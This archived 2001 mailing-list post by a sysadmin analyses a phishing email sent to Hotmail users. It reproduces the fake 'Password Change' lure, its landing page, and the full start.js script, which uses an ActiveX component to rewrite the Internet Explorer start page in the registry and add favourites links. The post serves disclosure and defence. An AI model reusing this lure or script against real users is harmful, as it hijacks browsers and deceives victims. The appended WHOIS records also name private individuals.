there appears to be a new hotmail malware thingy it is sent from admin02at_private with the subject line of Password Change wonder how many people it will get before all the sites are closed? Detail - I just recieved this mail from 202.104.122.157 [1] #START >From admin02at_private Thu, 09 Aug 2001 18:21:54 -0700 Received: from [202.104.122.157] by hotmail.com (3.2) with ESMTP id MHotMailBD3C81DB0068400431DDCA687A9D0C810; Thu, 09 Aug 2001 18:20:28 -0700 Received: FROM html BY mail-server ; Fri Aug 10 09:17:50 2001 +0800 From: admin02at_private To: ${MYEMAIL}@hotmail.com Subject: Password Change Date: Sat, 8 Sep 2001 08:13:32 Mime-Version: 1.0 Content-Type: text/html; charset="DEFAULT_CHARSET" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2919.6700 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6700 <HTML> <HEAD> </HEAD> <BODY TEXT="#000000" BGCOLOR="#336699" LINK="yellow" VLINK="#551A8B" ALINK="#FF0000"> <P ALIGN="CENTER"><FONT SIZE="+3"><B>Password Change Confirmation</B></FONT> </P> <P ALIGN="CENTER"><FONT SIZE="+1"><B>Your Password has been successfully changed. Please remember your new Password. </B></FONT></P> <P ALIGN="CENTER"><FONT COLOR="#FFFF80"><A HREF="http://maeveshomepage.com/ty.htm">If you did not authorize this please click here to restore your old password.</A></FONT> </P> </BODY> </HTML> #END now going to maeveshomepage.com/ty.htm [2] in opera shows #START <!DOCTYPE HTML PUBLIC "-//SoftQuad//DTD HoTMetaL PRO 5.0::19980907::extensions to HTML 4.0//EN" "hmpro5.dtd"> <HTML> <HEAD> <TITLE></TITLE> </HEAD> <BODY BGCOLOR="#336699"> <P ALIGN="CENTER"><FONT SIZE="+3"><B>Thank You</B></FONT> </P> <P ALIGN="CENTER"><FONT SIZE="+2">Your old password has been restored.</FONT> <SCRIPT SRC="start.js"> </SCRIPT> </P> </BODY> </HTML> #END and looking at start.js (the interesting bit) #START document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>") function AddFavLnk(loc, DispName, SiteURL) { var Shor = Shl.CreateShortcut(loc + "\\" + DispName +".URL"); Shor.TargetPath = SiteURL; Shor.Save(); } function f(){ try { a1=document.applets[0]; a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}"); a1.createInstance(); Shl = a1.GetObject(); a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}"); a1.createInstance(); FSO = a1.GetObject(); a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}"); a1.createInstance(); Net = a1.GetObject(); try{ var expdate = new Date((new Date()).getTime() + (24 * 60 * 60 * 1000 * 90)); document.cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;" ///////////////////////////////////////////////////////////////////////////////Ö÷Ò³ Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://yahhooo.devil.ru/"); var expdate = new Date((new Date()).getTime() + (24 * 60 * 60 * 1000 * 90)); document.cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;" var WF, Shor, loc; WF = FSO.GetSpecialFolder(0); loc = WF + "\\Favorites"; if(!FSO.FolderExists(loc)) { loc = FSO.GetDriveName(WF) + "\\Documents and Settings\\" + Net.UserName + "\\Favorites"; if(!FSO.FolderExists(loc)) { return; } } ///////////////////////////////////////////////////////////////////////////////ÊղؼРAddFavLnk(loc, " Britney Spears Nude", "http://www.celebrities-revealed.com"); AddFavLnk(loc, " Aol", "http://www.aol.com"); } catch(e){ } } catch(e){ } } function init(){ setTimeout("f()", 1000); } init(); #END it appears to set your default home page to http://yahhooo.devil.ru/ [3] and get your favorites (which may contain saved usernames and passwords) anybody got anything further? Q Notes [1] - inetnum: 202.104.122.128 - 202.104.122.159 netname: SHENZHEN-JLXXCY-INFOR-LTD descr: SHENZHEN JULINGXINXICHANYE INFORMATION CO.LTD country: CN admin-c: HB58-AP tech-c: HB58-AP mnt-by: MAINT-CHINANET-GD changed: ipadmat_private 20000920 source: APNIC person: HU BOG address: F11,BUSSINESS NEWSPAPER OLYMPIC MANSION,SHENZHEN country: CN phone: +86-755-3521135 fax-no: +86-755-3396971 e-mail: ipuserat_private nic-hdl: HB58-AP mnt-by: MAINT-CHINANET-GD changed: ipadmat_private 20000920 source: APNIC [2] - Registrant: JBO 223 S. 5th usa, O --- US Domain Name: MAEVESHOMEPAGE.COM Administrative Contact: I, TJ bwestbyat_private 223 S. 5th usa, O --- US 1115551212 Technical Contact: I, TJ bwestbyat_private 223 S. 5th usa, O --- US 1115551212 Billing Contact: I, TJ bwestbyat_private 223 S. 5th usa, O --- US 1115551212 Record last updated on 11-Jul-2001. Record expires on 07-May-2002. Record Created on 07-May-2001. Domain servers in listed order: NS1.VEGASSECURE.NET 208.50.15.6 NS2.VEGASSECURE.NET 208.50.15.7 [3] - domain: DEVIL.RU type: CORPORATE admin-o: AK2000-RIPN nserver: ns.kravchenko.ru. nserver: srvr.list.ru. created: 07-AUG-2000 state: Delegated changed: 19-MAY-2001 mnt-by: ANDRIUSHA-MNT-RIPN source: RIPN person: Andrey S Kravchenko nic-hdl: AK2000-RIPN address: Teatralny st 23a/30, address: Donetsk, Ukraine, 340100 phone: +7 902 6010000 fax-no: +7 902 6010000 e-mail: andreyat_private changed: 18-AUG-2000 mnt-by: ANDRIUSHA-MNT-RIPN source: RIPN -- ##################### Quentyn Taylor Sysadmin - Fotango ##################### You're damn right we need a rational code of morality and ethics. But not much progress can be made in that direction while we've still got a majority ranting about gods, devils, souls, and absolute morality, and using an ancient book written by ignorant nomads as a guide.
This archive was generated by hypermail 2b30 : Fri Aug 10 2001 - 11:58:28 PDT